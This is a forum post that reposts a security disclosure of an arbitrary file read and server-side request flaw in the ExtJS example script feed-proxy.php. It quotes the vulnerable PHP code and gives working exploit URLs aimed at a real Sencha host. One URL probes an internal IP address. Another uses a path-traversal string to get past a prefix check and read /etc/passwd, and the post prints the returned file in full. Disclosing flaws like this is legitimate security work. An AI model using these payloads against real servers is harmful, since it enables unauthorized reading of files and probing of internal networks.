Jump to content
KhiZaRix

extjs Arbitrary File Read

Recommended Posts


Hi all??

Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services

File: /examples/feed-viewer/feed-proxy.php line:3-line:6

$feed = $_REQUEST['feed'];


if($feed != '' && strpos($feed, 'http') === 0){


header('Content-Type: text/xml');


$xml = file_get_contents($feed);




When we request like this url
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1

if the resource exist,we can get internal http services info

??strpos($feed, 'http') === 0?? we can request this url to bypass the restrictions achieve arbitrary file read

http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd


view the HTML source code


root:x:0:0:Web-useast4 root:/root:/bin/bash


daemon:x:1:1:daemon:/usr/sbin:/bin/sh


bin:x:2:2:bin:/bin:/bin/sh


sys:x:3:3:sys:/dev:/bin/sh


sync:x:4:65534:sync:/bin:/bin/sync


games:x:5:60:games:/usr/games:/bin/sh


man:x:6:12:man:/var/cache/man:/bin/sh


lp:x:7:7:lp:/var/spool/lpd:/bin/sh


mail:x:8:8:mail:/var/mail:/bin/sh


news:x:9:9:news:/var/spool/news:/bin/sh


uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh


proxy:x:13:13:proxy:/bin:/bin/sh


www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh


backup:x:34:34:backup:/var/backups:/bin/sh


list:x:38:38:Mailing List Manager:/var/list:/bin/sh


irc:x:39:39:ircd:/var/run/ircd:/bin/sh


gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh


nobody:x:65534:65534:nobody:/nonexistent:/bin/sh


libuuid:x:100:101::/var/lib/libuuid:/bin/sh


syslog:x:101:103::/home/syslog:/bin/false


messagebus:x:102:105::/var/run/dbus:/bin/false


landscape:x:103:108::/var/lib/landscape:/bin/false


sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin


ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash


ntp:x:105:111::/home/ntp:/bin/false


snmp:x:106:112::/var/lib/snmp:/bin/false


statd:x:107:65534::/var/lib/nfs:/bin/false


postfix:x:108:114::/var/spool/postfix:/bin/false





Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team

________________________________
Id:Yaseng
Hi: Hisengberg
Team: Baidu X-team
E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com>
[tips]

Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...